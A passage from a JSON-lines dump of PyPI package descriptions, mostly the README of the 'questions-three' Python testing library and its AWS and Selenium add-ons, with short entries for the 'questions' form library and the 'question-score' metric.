inti.predict(text,type='list')\n[-0.2737383, 0.3481976]\n\n# Predict intimacy for a long list of questions\n>>> text = [a long list of questions]\n>>> inti.predict(text,type='long_list',tqdm=tqdm)\n[-0.2737383, 0.3481976, ... ,-0.2737383, 0.3481976]ContactJiaxin Pei (pedropei@umich.edu)"} +{"package": "question-myproject", "pacakge-description": "No description available on PyPI."} +{"package": "questionnaire", "pacakge-description": "Check it out on GitHub\u2026"} +{"package": "question-package", "pacakge-description": "No description available on PyPI."} +{"package": "questions", "pacakge-description": "QuestionsQuestions is a Python form library that uses the power ofSurveyJSfor the UI.\nThe philosophy behind Questions is that modern form rendering usually requires\nintegrating some complex Javascript widgets anyway, so why not skip the markup\ngeneration completely?In Questions, forms are defined in Python similarly to other form frameworks,\nbut everything on the front end is handled by SurveyJS. This provides a lot of\nbenefits:Nice, integrated UI, with powerful Javascript widgets.SurveyJS is compatible with Angular2, JQuery, KnockoutJS, React and VueJS.\nQuestions makes sure that you get the right files for each version.More than 20 question types, from simple text inputs and dropdowns to\nelaborate widgets like dynamic panels and checkbox matrices.Multiple look and feel options (themes), includingBootstrapCSS support.Full client side validation (plus server side checking, too).Use simple text expressions in question declarations to control which\nquestions to show depending on the answers to previous ones.Complex forms can be defined easily using class composition.Easy multi-page forms, with no state-keeping headaches.Create forms directly from JSON definitions using SurveyJS form creator.Generate Python code from dynamic JSON import.Minimal code for simple apps. If you just need a form or two, you are set.Zero Javascript code option. If you can use a CDN, no need to install or\ndownload any javascript.Out of the box integration with popular third party widgets, likeselect2andckeditor.Supports the creation of tests and quizzes, by defining \u201ccorrect\u201d answers to\nthe questions, and optionally setting a maximum time to finish.How the Code LooksTo get a feel for how Questions works, nothing better than looking at a simple\nexample:from questions import Form\nfrom questions import TextQuestion\nfrom questions import RadioGroupQuestion\n\n\nclass SimpleForm(Form):\n name = TextQuestion()\n email = TextQuestion(input_type=\"email\", required=\"True\")\n favorite_number = TextQuestion(title=\"What is your favorite number?\",\n input_type=\"number\")\n language = RadioGroupQuestion(title=\"Favorite Language\",\n choices=[\"Python\", \"Other\"])\n version = RadioGroupQuestion(title=\"Preferred Python Version\",\n choices=[\"Python 2\", \"Python 3\"],\n visible_if=\"{language} = 'Python'\")This is a fairly conventional way to define forms, so no surprises here, but\nlook at the way theinput_typeparameter allows us to use different HTML5\ntext input methods. Pay special attention to the last line, where we use thevisible_ifparameter to only show the Python version question if the\nanswer to thelanguagequestion is \u201cPython\u201d. Defining \u201clive\u201d form behavior\nin this way is something that is usually out of scope for server side code,\nbut Questions\u2019 SurveyJS integration allows us to do it.Full Working Multi-page Flask ApplicationLet\u2019s show how easy things can be if your applications needs are simple. The\nfollowing is a complete application using the popularFlaskweb framework:from flask import Flask\nfrom flask import redirect\nfrom flask import request\n\nfrom questions import Form\nfrom questions import FormPage\nfrom questions import TextQuestion\nfrom questions import DropdownQuestion\n\n\nclass PageOne(Form):\n name = TextQuestion()\n email = TextQuestion(input_type=\"email\", required=\"True\")\n\n\nclass PageTwo(Form):\n country = DropdownQuestion(choices_by_url={\"value_name\": \"name\",\n \"url\": \"https://restcountries.eu/rest/v2/all\"})\n birthdate = TextQuestion(input_type=\"date\")\n\n\nclass Profile(Form):\n page_one = FormPage(PageOne, title=\"Identification Information\")\n page_two = FormPage(PageTwo, title=\"Additional Information\")\n\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=(\"GET\",))\ndef form():\n form = Profile()\n return form.render_html()\n\n@app.route(\"/\", methods=(\"POST\",))\ndef post():\n form_data = request.get_json()\n # Here, we would save to a database or something\n print(form_data)\n return redirect(\"/thanks\")\n\n@app.route(\"/thanks\")\ndef thanks():\n return \"Thanks for your information\"\n\nif __name__ == \"__main__\":\n app.run()By default, Questions uses a CDN for fetching the Javascript resources, which\nis why all that is needed to run the above code is installing Flask and\nQuestions. Of course, it is possible to install all the dependencies yourself\nand configure Questions to use your installation, but sometimes this is all\nthat\u2019s required to get a full working application.Admittedly, our application doesn\u2019t do much, but we get a working form that you\ncan fill and submit in your browser. See how easy it is to get a multi-page\nform with navigation buttons. Also, notice howget_jsonis the only Flask\nrequest call we need to get the form data.As the code shows, defining a multiple page form is very simple, and allows us\nto keep the form pages logically separated, and even using them independently\nor in combination with other forms with little additional work.Finally, take a look at thechoices_by_urlparameter in the\nDropdownQuestion, which allows us to get the dropdown choices from separate,\nrestful web services.License and DocumentationFree software: MIT licenseDocumentation:https://questions.readthedocs.io.CreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.5.0a0 (2020-10-01)First release on PyPI.0.5.0a1 (2020-12-09)Fix bug that caused Questions to crash when two or more panels were used in\none form.Add feature for creating Form subclasses from JSON data.Add screencast to README page.Update docs.Update dependencies to latest versions.0.5.0a2 (2020-12-09)Fix bug with form parameters in from_json conversion.0.5.0a3 (2020-12-10)Make sure jinja templates are included in manifest.0.7.0a4 (2020-12-13)Update installation docs to mention typing-extensions requirement for\nPython < 3.8.Use correct default value for allow_clear in signature pad.Set type hints to allow localization arrays in visible text properties.Fix bug when generating classes from JSON with dynamic panels.Add string representation methods to main classes.Feature: add console script for generating code for classes created with\nfrom_json method.0.7.1 (2022-09-18)Bug fix: do not add a default page when other pages are defined.Update js CDN and tests.0.8.0 (2023-04-10)Bug fix: fix choices with translatable text (thanks @joan-qida).Bug fix: fix read the docs build.Update SurveyJS version.Use current SurveyJS supported themes.Include newer Python versions in tests.Add documentation for i18n.Various dependency updates."} +{"package": "question-score", "pacakge-description": "question-scoreRepository for KDA(Knowledge-dependent Answerability), EMNLP 2022 workHow to usepip install --upgrade pip\npip install question-scorefromquestion_scoreimportKDAkda=KDA()print(kda.kda_small(\"passage\",\"question\",[\"option1\",\"option2\",\"option3\",\"option4\"],1))What does the score mean?You can check the explanation of KDA onEMNLP 2022 papernow.\nThe official link from EMNLP 2022 will soon be released.You can use $KDA_{small}$ or $KDA_{large}$ instead of heavy metric using all model.\nBelow is the performance of the submetrics, which mentioned on the appendix of the paper.Sub MetricModel Count ( Total Size )KDA (Valid)Likert (Test)KDA_small4 (3.5GB)0.7400.377KDA_large10 (19.2GB)0.7840.421Citation@inproceedings{moon-etal-2022-evaluating,\n title = \"Evaluating the Knowledge Dependency of Questions\",\n author = \"Moon, Hyeongdon and\n Yang, Yoonseok and\n Yu, Hangyeol and\n Lee, Seunghyun and\n Jeong, Myeongho and\n Park, Juneyoung and\n Shin, Jamin and\n Kim, Minsam and\n Choi, Seungtaek\",\n booktitle = \"Proceedings of the 2022 Conference on Empirical Methods in Natural Language Processing\",\n month = dec,\n year = \"2022\",\n address = \"Abu Dhabi, United Arab Emirates\",\n publisher = \"Association for Computational Linguistics\",\n url = \"https://aclanthology.org/2022.emnlp-main.718\",\n pages = \"10512--10526\",\n abstract = \"The automatic generation of Multiple Choice Questions (MCQ) has the potential to reduce the time educators spend on student assessment significantly. However, existing evaluation metrics for MCQ generation, such as BLEU, ROUGE, and METEOR, focus on the n-gram based similarity of the generated MCQ to the gold sample in the dataset and disregard their educational value.They fail to evaluate the MCQ{'}s ability to assess the student{'}s knowledge of the corresponding target fact. To tackle this issue, we propose a novel automatic evaluation metric, coined Knowledge Dependent Answerability (KDA), which measures the MCQ{'}s answerability given knowledge of the target fact. Specifically, we first show how to measure KDA based on student responses from a human survey.Then, we propose two automatic evaluation metrics, KDA{\\_}disc and KDA{\\_}cont, that approximate KDA by leveraging pre-trained language models to imitate students{'} problem-solving behavior.Through our human studies, we show that KDA{\\_}disc and KDA{\\_}soft have strong correlations with both (1) KDA and (2) usability in an actual classroom setting, labeled by experts. Furthermore, when combined with n-gram based similarity metrics, KDA{\\_}disc and KDA{\\_}cont are shown to have a strong predictive power for various expert-labeled MCQ quality measures.\",\n}"} +{"package": "questions-pkg-joanclopezm", "pacakge-description": "___ ______ ____ _ _ ___ \n / \\ \\ / / ___| / ___| | ___ _ _ __| |/ _ \\ \n / _ \\ \\ /\\ / /\\___ \\ | | | |/ _ \\| | | |/ _` | (_) |\n / ___ \\ V V / ___) | | |___| | (_) | |_| | (_| |\\__, |\n /_/ \\_\\_/\\_/ |____/ \\____|_|\\___/ \\__,_|\\__,_| /_/"} +{"package": "question-stack", "pacakge-description": "UNKNOWN"} +{"package": "questions-three", "pacakge-description": "Questions ThreeA Library for Serious Software Interrogators (and silly ones too)Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.-- The KeeperWhy you want thisThe vast majority of support for automatedsoftware checkingfalls into two main groups: low-level unit checking tools that guide design and maintain control over code as it is being written, andhigh-level system checkingtools that reduce the workload of human testers after the units have been integrated.The first group is optimized for precision and speed. A good unit check proves exactly one point in milliseconds. The second group is optimized for efficient use of human resources, enabling testers to repeat tedious actions without demanding much (or any) coding effort.Engineering is all about trade-offs. We can reduce the coding effort, but only if we are willing to sacrifice control. This makes the existing high-level automation tools distinctly unsatisfactory to testers who would prefer the opposite trade: more control in exchange for the need to approach automation as abona-fidesoftware development project.If you want complete control over your system-level automation and are willing to get some coding dirt under your fingernails in exchange, then Questions Three could be your best friend.As a flexible library rather than an opinionated framework, it will support you without dictating structures or rules. Its features were designed to work together, but you can use them separately or even integrate them into the third-party or homegrown framework of your choice.A note on heretical terminologyThe vast majority of software professionals refer to inspection work done by machines as \"automated testing.\" James Bach and Michael Bolton makea strong casethat this is a dangerous abuse of the word \"testing\" and suggest that we use \"checking\" instead when we talk about executing a procedure with a well-defined expected outcome.Questions Three tries to maintain neutrality in this debate. Where practical, it lets you choose whether you want to say \"test\" or \"check.\" Internally, it uses \"test\" for consistency with third-party libraries. As the public face of the project, this documentation falls on the \"check\" side. It says \"check suite\" where most testers would say \"test suite.\"Orientation ResourcesArticle:\"Waiter, There's aDatabasein My Unit Test!\"explains the differences between unit, integration, and system testing and the role for each.Video:\"Industrial Strength Automation\"presentation from STARWEST 2019 makes the cases for and against building a serious automation program. It concludes with an extended discussion on the history, purpose, and design of Questions Three.What's in the BoxScaffoldsthat help you structure your checks. Chose one from the library or use them as examples to build your own.Reportersthat provide results as expected by various readers. Use as many or as few as you would like, or follow the design pattern and build your own.Event Brokerwhich allows components to work together without knowing about one another. Need to integrate a new kind of reporter? Simply contact the broker and subscribe to relevant events. No need to touch anything else.HTTP Clientthat tracks its own activity and converts failures to meaningful artifacts for test reports.GraphQL Clientthat leverages the HTTP Client for an easy to use GraphQL interface.Logging Subsystemthat, among other things, allows you to control which modules log at which level via environment variables.Vanilla Functionsthat you might find useful for checking and are entirely self-contained. Use as many or as few as you would like.Bulk Suite Runnerthat lets you run multiple suites in parallel and control their execution via environment variables.Optional PackagesAmazon Web Services IntegrationsSelenium Integrationsthat facilitate compatibility checking and make Selenium WebDriver a full citizen of Question-Three's event-driven world.Quick StartInstall questions-threepip install questions-threeWrite the suitefrom questions_three.scaffolds.check_script import check, check_suite\n\nwith check_suite('ExampleSuite'):\n\n with check('A passing check'):\n assert True, 'That was easy'Run the suiteNo special executors are required. Just run the script:python example_suite.pyReview the resultsThe console output should look like this:2018-08-13 14:52:55,725 INFO from questions_three.reporters.event_logger.event_logger: Suite \"ExampleSuite\" started\n2018-08-13 14:52:55,726 INFO from questions_three.reporters.event_logger.event_logger: Check \"A passing check\" started\n2018-08-13 14:52:55,726 INFO from questions_three.reporters.event_logger.event_logger: Check \"A passing check\" ended\n2018-08-13 14:52:55,729 INFO from questions_three.reporters.event_logger.event_logger: Suite \"ExampleSuite\" endedThere should also be a reports directory which contains a report:> ls reports\nExampleSuite.xml jenkins_statusExampleSuite.xml is a report in theJUnit XMLformat that can be consumed by many report parsers, including Jenkins CI. It gets produced by the junit_reporter module.jenkins_status is a plain text file that aggregates the results of all test suites from a batch into a single result which Jenkins can display. It gets produced by the jenkins_build_status module.ScaffoldsScaffolds provide a basic structure for your checks. Their most important function is to publish events as your checks start, end, and fail.The top-to-bottom script scaffoldfrom questions_three.scaffolds.check_script import check, check_suite\n\nwith check_suite('ExampleSuite'):\n\n with check('A passing check'):\n assert True, 'That was easy'\n\n with check('A failing check'):\n assert False, 'Oops'If you don't like saying \"check,\" you can say \"test\" instead:from questions_three.scaffolds.test_script import test, test_suite\n\nwith test_suite('ExampleSuite'):\n\n with test('A passing check'):\n assert True, 'That was easy'\n\n with test('A failing check'):\n assert False, 'Oops'This code is an ordinary executable python script, so you can simply execute it normally.python example_suite.pyThe xUnit style scaffoldAs its name suggests, the xUnit scaffold implements the well-wornxUnit pattern.from questions_three.scaffolds.xunit import TestSuite, skip\n\n\nclass MyXunitSuite(TestSuite):\n\n def setup_suite(self):\n \"\"\"\n Perform setup that affects all tests here\n Changes to \"self\" will affect all tests.\n \"\"\"\n print('This runs once at the start of the suite')\n\n def teardown_suite(self):\n print('This runs once at the end of the suite')\n\n def setup(self):\n \"\"\"\n Perform setup for each test here.\n Changes to \"self\" will affect the current test only.\n \"\"\"\n print('This runs before each test')\n\n def teardown(self):\n print('This runs after each test')\n\n def test_that_passes(self):\n \"\"\"\n The method name is xUnit magic.\n Methods named \"test...\" get treated as test cases.\n \"\"\"\n print('This test passes')\n\n def test_that_fails(self):\n print('This test fails')\n assert False, 'I failed'\n\n def test_that_errs(self):\n print('This test errs')\n raise RuntimeError('I tried to think but nothing happened')\n\n def test_that_skips(self):\n print('This test skips')\n skip(\"Don't do that\")The most important advantage of the xUnit scaffold over the script one is that it automatically repeats the same set-up and tear-down routines betweentest_...functions. Its main disadvantage is that the suites aren't as beautiful to read.Thanks to some metaclass hocus-pocus which you're free to gawk at by looking at the source code, this too is an ordinary Python executable file:python my_xunit_suite.pyThe Test Table ScaffoldThe Test Table scaffold was designed to support two use cases:You would like to repeat the same procedure with different sets of arguments.You would like to execute the same procedure multiple times to measure performance.Example test table that varies argumentsfrom expects import expect, equal\nfrom questions_three.scaffolds.test_table import execute_test_table\n\nTABLE = (\n ('x', 'y', 'expect sum', 'expect exception'),\n (2, 2, 4, None),\n (1, 0, 1, None),\n (0, 1, 0, None),\n (0.1, 0.1, 0.2, None),\n (1, 'banana', None, TypeError),\n (1, '1', None, TypeError),\n (2, 2, 5, None))\n\n\ndef test_add(*, x, y, expect_sum):\n expect(x + y).to(equal(expect_sum))\n\n\nexecute_test_table(\n suite_name='TestAddTwoThings', table=TABLE, func=test_add)Example test table that measures performancefrom questions_three.scaffolds.test_table import execute_test_table\n\nTABLE = (\n ('operation', 'sample size'),\n ('1 + 1', 30),\n ('1 * 1', 60),\n ('1 / 1', 42))\n\n\ndef calculate(operation):\n exec(operation)\n\n\nexecute_test_table(\n suite_name='MeasureOperatorPerformance',\n table=TABLE, func=calculate, randomize_order=True)The optionalrandomize_orderargument instructs the scaffold to execute the rows\nin a random order (to mitigate systematic bias that could affect measurements).For each row that exits cleanly (no assertion failures or other exceptions),\nthe scaffold publishes a SAMPLE_MEASURED event that a reporter can collect.\nFor example, the built-in EventLogger logs each of these events, including\nthe row execution time.Like the other built-in scaffolds, the Test Table produces plain old Python executable scripts.Building your own scaffoldNothing stops you from building your own scaffold. The test_script scaffold makes a good example of the services your scaffold should provide. The xUnit scaffold is much more difficult to understand (but more fun if you're into that sort of thing).The key to understanding scaffold design is to understand theevent-driven nature of Questions Three. Scaffolds are responsible for handling exceptions and publishing the following events:SUITE_STARTEDSUITE_ERREDSUITE_ENDEDTEST_SKIPPEDTEST_STARTEDTEST_ERREDTEST_FAILEDTEST_ENDEDReportersIn Questions Three, \"reporter\" is a broad term for an object that listens for an event, converts it to a message useful to someone or something and sends the message. Built-in reporters do relatively dull things like sending events to the system log and producing the Junit XML report, but there is no reason you couldn't build a more interesting reporter that launches a Styrofoam missile at the developer who broke the build.Built-in reportersNameEvents it subscribes towhat it doesArtifact SaverARTIFACT_CREATED, REPORT_CREATEDSaves artifacts to the local filesystem.Event Loggerall test lifecycle eventsSends messages to system log.Junit Reporterall test lifecycle eventsBuilds Junit XML reports and publishes them as REPORT_CREATED events.Result Compilerall test lifecycle eventsReports how many tests ran, failed, etc, and how long they took. Publishes SUITE_RESULTS_COMPILED after SUITE_ENDED.Custom reportersA reporter can do anything you dream up and express as Python code. That includes interacting with external services and physical objects. Think \"when this occurs during a test run, I want that to happen.\" For example, \"When the suite results are compiled and contain a failure, I want a Slack message sent to the channel where the developers hang out.\"Building a custom reporterResult Compiler provides a simple example to follow. You don't have to copy the pattern it establishes, but it's an easy way to start. TheResultCompilerclass has one method for each event to which it subscribes. Each method is named after the event (e.g.on_suite_started). These method names are magic. The importedsubscribe_event_handlersfunction recognizes the names and subscribes each method to its respective event. Theactivatemethod is mandatory. The scaffold calls it before the suite starts.activateperforms any initialization, most importantly subscribing to the events.Installing a custom reporterEnsure that the package containing your reporter is installed.Create a text file that contains the name of the reporter class, including its module (e.g.my_awesome_reporters.information_radiators.LavaLamp). This file can contain as many reporters as you would like, one per line.Set the environment variableCUSTOM_REPORTERS_FILEto the full path and filename of your text file.Event BrokerThe Event Broker is Questions Three's beating heart. It's how the components communicate with one another. If you're not in the business of building custom components and plugging them in, you won't need to think about the Event Broker. If you are, it's all you'll need to think about.The Event Broker is little more than a simple implementation of thePublish/Subscribe Pattern. Component A subscribes to an event by registering a function with the Event Broker. Component B publishes the event with an optional dictionary of arbitrary properties. The Event Broker calls the subscriber function, passing it the dictionary as keyword arguments.An event can be any object. Internally, Questions Three limits itself to members of an enum called TestEvent. It's defined inquestions_three.constants.An event property can also be any object. Property names are restricted to valid Python variable names so the Event Broker can send them as keyword arguments.HTTP ClientThe HTTP client is a wrapper around the widely-usedrequests module, so it can serve as a drop-in replacement. Its job in life is to integraterequestsinto the event-driven world of Questions Three, doing things like publishing an HTTP transcript when a check fails. It also adds a few features that you can use. Nearly all of the documentation forrequestsapplies to HttpClient as well. There are two deviations, one significant and one somewhat obscure.Deviation 1: HTTP Client raises an exception when it encounters an exceptional status codeWhen the HTTP server returns an exceptionalstatus code(anything in the 400 - 599 range),requestssimply places the status code in the response as it always does and expects you to detect it. HTTP Client, by contrast, detects the status for you and raises anHttpError. There is anHttpErrorsubclass for each exceptional status code defined byRFC 7231(plus one fromRFC 2324just for fun), so you can be very specific with yourexceptblocks. For example:from questions_three.exceptions.http_error import HttpImATeapot, HttpNotFound, HttpServerError\nfrom questions_three.http_client import HttpClient\n\ntry:\n HttpClient().get('http://coffee.example.com')\nexcept HttpImATeapot as e:\n # This will catch a 418 only\n # e.response is the requests.Response object returned by `requests.get`\n do_something_clever(response=e.response)\nexcept HttpNotFound:\n # This will catch a 404 only\n do_something_sad()\nexcept HttpServerError:\n # This will catch anything in the 500-599 range.\n do_something_silly()Deviation 2: json is not allowed as a keyword argumentrequestsallows you to write this:requests.post('http://songs.example.com/', json=['spam', 'eggs', 'sausage', 'spam'])HTTP Client does not support this syntax because it interferes with transcript generation. Instead, write this:HttpClient().post('http://songs.example.com/', data=json.dumps(['spam', 'eggs', 'sausage', 'spam'])New feature: simplified cookie managementInstead of creating arequests.Session, you can simply do this:client = HttpClient()\nclient.enable_cookies()The client will now save cookies sent to it by the server and return them to the server with each request.New feature: persistent request headersThis is particularly useful for maintaining an authenticated session:client = HttpClient()\nclient.set_persistent_headers(session_id='some fake id', secret_username='bob')The client will now send the specified headers to the server with each request.New feature: callbacks for exceptional HTTP responsesInstead of putting each request into its own try/except block, you can install\na generic exception handler as acallback:def on_not_found(exception):\n mother_ship.beam_up(exception, exception.response.text)\n\nclient = HttpClient()\nclient.set_exceptional_response_callback(exception_class=HttpNotFound, callback=on_not_found)\nclient.get('https://something-that-does-not-exist.mil/')In the example above, the server will respond to theGETrequest with anHTTP 404(Not Found) response. The client will notice that it has a callback for theHttpNotFoundexception, so will callon_not_foundwith theHttpNotFoundexception as theexceptionkeyword argument.If a callback returnsNone(as in the example above), the client will re-raise the exception after it processes the callback. If the callback returns anything else, the client will return whatever the callback returns. Please observe thePrinciple of Least Astonishmentand have your callback return eitherNoneor else anHttpResponseobject.Installed callbacks will apply to child exception classes as well, so a callback forHttpClientErrorwill be called if the server returns anHttpNotFoundresponse (becauseHttpClientErroris the set of all 4xx responses andHttpNotFoundis 404).You can install as many callbacks as you would like, with one important restriction. You may not install a parent class or a child class of an exception that already has an associated callback. For example, you may install bothHttpNotFoundandHttpUnauthorized, but you may not install bothHttpNotFoundandHttpClientErrorbecauseHttpClientErroris a parent class ofHttpNotFound.Seequestions_three/exceptions/http_error.pyfor complete details of the HttpError\nclass hierarchy. It follows the classification scheme specified in RFC 7231.Tuning with environment variablesHTTP_PROXYThis is a well-established environment variable. Set it to the URL of your proxy for plain HTTP requests.HTTPS_PROXYAs above. Set this to the URL of your proxy for secure HTTP requestsHTTPS_VERIFY_CERTSSet this to \"false\" to disable verification of X.509 certificates.HTTP_CLIENT_SOCKET_TIMEOUTStop waiting for an HTTP response after this number of seconds.GraphQL ClientThe GraphQL Client is a wrapper around the HTTP Client that allows for a simple way of making and handling requests against\na GraphQL endpoint. Since the HTTP Client is doing all the heavy lifting, there is only a few custom behaviors that the GraphQL\nClient has.Using the GraphQL Clientclient = HttpClient() # This is where you would authenticate, if needed\ngraphql_client = GraphqlClient(http_client=client, url='https://www.yoursite.com/graph')\n\nyour_important_query = \"\"\"\n query {\n ...\n {\n\"\"\"\ngraphql_client.execute(your_important_query)executeis a neutral method that makesPOSTrequests against your GraphQL endpoint for either Queries or Mutations.\nThe first argument ofexecuteis always the operation that you are trying to perform, and any key-word arguments\nafterwards are turned into your given variables.your_important_query = \"\"\"\n query ($id: String!) {\n ...\n {\n\"\"\"\ngraphql_client.execute(your_important_query, id='1234')Upon making your request (that does not result in an HTTP Error), you will either get aGraphqlResponseobject, or\nif you received errors in your response, anOperationFailedexception will be raised.GraphqlResponseobjects have the following:.http_responseproperty: Therequests.Responseobject returned by the HTTP Client.dataproperty: The JSON representation of your response.data_as_structureproperty: The Structure object representation of your responseOperationFailedexceptions have the following:.http_responseproperty: Therequests.Responseobject returned by the HTTP Client.dataproperty: The JSON representation of your (successful parts of the) response.errorsproperty: The JSON representation of the errors included in your response.operationproperty: The query or mutation sent in your request.operation_variablesproperty: The variables send in your requestWhen raised, the exception message will include the errors strings, or the entire error collectionLogging SubsystemQuestions Three extends Python's logging system to do various things internally that won't matter to most users. However, there's one feature that may be of interest. You can customize how verbose/noisy any given module will be. Most common targets are event_broker when you want to see all the events passing through and http_client when you want excruciating detail about every request and response.export QUESTIONS_THREE_EVENT_BROKER_LOG_LEVEL=INFO\nexport QUESTIONS_THREE_HTTP_CLIENT_LOG_LEVEL=DEBUGThis works with any Questions Three module and any log level defined in theFine Python Manual.You can make it work with your custom components too:from questions_three.logging import logger_for_module\n\nlog = logger_for_module(__name__)\nlog.info('I feel happy!')Vanilla FunctionsYou'll find these inquestions_three.vanilla. The unit tests undertests/vanillaprovide examples of their use.b16encode()Base 16 encode a string. This is basically a hex dump.call_with_exception_tolerance()Execute a function. If it raises a specific exception, wait for a given number of seconds and try again up to a given timeoutformat_exception()Convert an exception to a human-friendly message and stack tracepath_to_entry_script()Return the full path and filename of the script that was called from the command linerandom_base36_string()Return a random string of a given length. Useful for generating bogus test data.string_of_sequential_characters()Return a string of letters and numbers in alphabetical order. Useful for generating bogus but deterministic test data.url_append()Replacement forurljointhat does not eliminate characters when slashes are present but does join an arbitrary number of parts.wait_for()Pauses until the given function returns a truthy value and returns the value. Includes a throttle and a timeout.Bulk Suite RunnerTo run all suites in any directory below./my_checks:python -m questions_three.ci.run_all my_checksControlling execution with environment variablesMAX_PARALLEL_SUITESRun up to this number of suites in parallel. Default is 1 (serial execution).REPORTS_PATHPut reports and other artifacts in this directory. Default:./reportsRUN_ALL_TIMEOUTAfter this number of seconds, terminate all running suites and return a non-zero exit code.TEST_RUN_IDAttach this arbitrary string as a property to all events. This allows reporters to discriminate one test run from another.Understanding events and reports(or the philosophy of errors, failures, and warnings)Questions Three follows the convention set by JUnit and draws an important distinction between error events and failure events. This distinction flows from the scaffolds to the Event Broker to the reports.Afailure eventoccurs when a check makes a false assertion. The simplest way to trigger one isassert Falsewhich Python converts to anAssertionErrorwhich the scaffold converts to aTEST_FAILEDevent. The intent of the system is to produce a failure event only when there is high confidence that there is a fault in the system under test.Anerror eventoccurs when some other exception gets raised (or, for whatever batty reason, something other than a check raises anAssertionError). Depending on the context from which the exception was raised, the scaffold will convert it into aSUITE_ERREDor aTEST_ERREDevent. In theory, an error event should indicate a fault in the check. In practice, the fault could be anywhere, especially if the system under test behaves in unanticipated ways.Because of the expectation that failure events indicate faults in the checks and error events indicate faults in the system under test, theEvent Loggerreports failure events as warnings and error events as errors. The warning indicates that the check did its job perfectly and the fault was somewhere else. The error indicates that the fault is in the check. Of course, real life is not so clean.Because the distinction originated from the JUnit world,Junit XML Reporterhas no need to perform any interpretation. It reports failure events as failures and error events as errors."} +{"package": "questions-three-aws", "pacakge-description": "Amazon Web Services Integrations for Questions ThreeThis is an optional package for theQuestions Three testing library.S3 Artifact SaverAs the name implies, the S3 Artifact Saver saves artifacts to an AWS S3 bucket. It subscribes toARTIFACT_CREATEDandREPORT_CREATEDevents and saves everything it sees. Among other things, this will include JUnit XML test reports, HTTP transcripts from the built-in HTTP Client, and screenshots and DOM dumps from theoptional Selenium integrations.ActivationCreate (or append) a custom reporters file:echo questions_three_aws.s3_artifact_saver.S3ArtifactSaver >> /var/custom_reportersInform Questions Three about the custom reporters file:export CUSTOM_REPORTERS_FILE=/var/custom_reportersTell the S3 Artifact Saver which bucket to use:export S3_BUCKET_FOR_ARTIFACTS=spam-eggs-sausage-spam(Optional) Specify an object(folder) prefix to which test runs will be saved within the specified bucket:export S3_PREFIX_OBJECT_NAME=some_test_runnerSet appropriate environment variables for AWS:Seethe fine AWS documentation. At a minimum, you will need credentials and a region."} +{"package": "questions-three-selenium", "pacakge-description": "Selenium Integrations for Questions ThreeThis document assumes you are familiar with bothQuestions ThreeandSelenium WebDriverand are interested in putting them together to build beautiful Web UI checks.FeaturesExtended WebDriver class (Browser)Does everything that WebDriver canAutomatically publishes a screen shot and a DOM dump for each test failureProvides extra \"find\" methods with a more pythonic syntaxCan place artifacts in local (HTML 5) storageCan detect navigation to a new pageWaterproof, as used in hospitalsSupport for remote browsersBrowserStackSelenium GridA trivial exampleThis example assumes that you have Chrome andChromedriverinstalled locally. Chrome is the default browser but Firefox is also supported. SeeControlling behavior with environment variables.pip install questions-three-seleniumtrivial_example.pyfrom expects import expect, contain\nfrom questions_three.scaffolds.test_script import test, test_suite\nfrom questions_three_selenium.browser.browser import Browser\n\nwith test_suite('SeleniumExample'):\n\n browser = Browser()\n browser.get('http://www.example.com')\n\n # This test will probably pass\n with test('Verify text contains example domain'):\n html = browser.find_unique_element(tag_name='html')\n expect(html.text.lower()).to(contain('example domain'))\n\n # This test should fail unless the Spinach Inquisition takes over example.com\n with test('Verify text contains Cardinal Biggles'):\n html = browser.find_unique_element(tag_name='html')\n expect(html.text.lower()).to(contain('Cardinal Biggles'))python3 trivial_example.pyThe example includes a failing case so you can inspect thereportsdirectory and see the artifacts that get saved when something fails.Controlling behavior with environment variablesBROWSER_LOCATIONSet this to \"local\" to use a local browserSet it to \"browserstack\" to use a remote browser via BrowserStackSet it to \"selenium_grid\" to use a remote browser via Selenium GridUSE_BROWSERSet this to \"chrome\" to use ChromeSet it to \"firefox\" to use FirefoxUSE_BROWSER_VERSIONRequest this version of the browser. Applies only to remotes.CHROME_USER_AGENTIf using Chrome, pretend to be some other browser by hacking the user agent string to this.BROWSER_AVAILABILITY_TIMEOUTWait up to this number of seconds for a browser to become availableBROWSER_ELEMENT_FIND_TIMEOUTWait up to this number of seconds for a requested element to appear in the DOMSUPPRESS_BROWSER_EXIT_ON_FAILUREOrdinarily, the browser will close automatically when the test suite ends. Set this to \"true\" to leave the browser open after something breaks. Useful for debugging.Browser objectsThe trivial example launches a web browser by instantiating aBrowserobject.Browseris mostly a wrapper aroundselenium.webdriver.[browser name].webdriver.WebDriver.It can behave like an ordinary WebDriver objectBrowserobjects can do anything that the underlyingWebDrivercan do, as documented inSelenium with Python.Here is the simple example from the Selenium documentation, modified to useBrowser:from questions_three_selenium import Browser\nfrom selenium.webdriver.common.keys import Keys\n\ndriver = Browser()\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\nelem = driver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\ndriver.close()The example callsdriver.close()but, when you instantiate aBrowserinside a Questions Three suite, it will close automatically after the suite ends.Artifact publishingBrowseris capable of producing a screen shot or a DOM dump (human-readable HTML file that shows all elements in the DOM at some point in time).Manual generationMost of the time, you won't need to do this becauseBrowserautomatically publishes artifacts when a failure occurs, but it's possible:from questions_three_selenium.dom_dumper.dump_dom import dump_dom\n\nbrowser = Browser()\nbrowser.get('http://www.example.com/')\n\nhtml_string = dump_dom(browser)\nscreenshot_png_bytes = browser.get_screenshot_as_png()\n# Use your imagination. Do something creative with your artifacts.Automatic publishingBottom line: you'll see a DOM dump and a screen shot in thereportsdirectory for each test that fails. Read on if you would like to understand how this works.At its core, Questions Three isevent-driven. When something goes wrong, the scaffold publishes the appropriate event (SUITE_ERRED,TEST_ERRED, orTEST_FAILED).Browsersubscribes to all three. When any of these events occurs, it does the following:Take a screen shot of itselfPublish the screen shot as anARTIFACT_CREATEDeventTake a DOM dump of itselfPublish the DOM dump as anARTIFACT_CREATEDeventBy default, Questions Three activates a reporter calledArtifactSaver. It subscribes toARTIFACT_CREATEDevents and saves each artifact to the appropriate place underreports.Extra find methodsaBrowserinstance can be used just like an ordinaryWebDriverinstance. For the sake of convenience and readability, it offers alternative methods for finding elements.pythonic syntaxThe extra methods accept locators as keyword arguments, so instead of thisbrowser.find_elements(By.LINK_TEXT, 'Finland')you can write 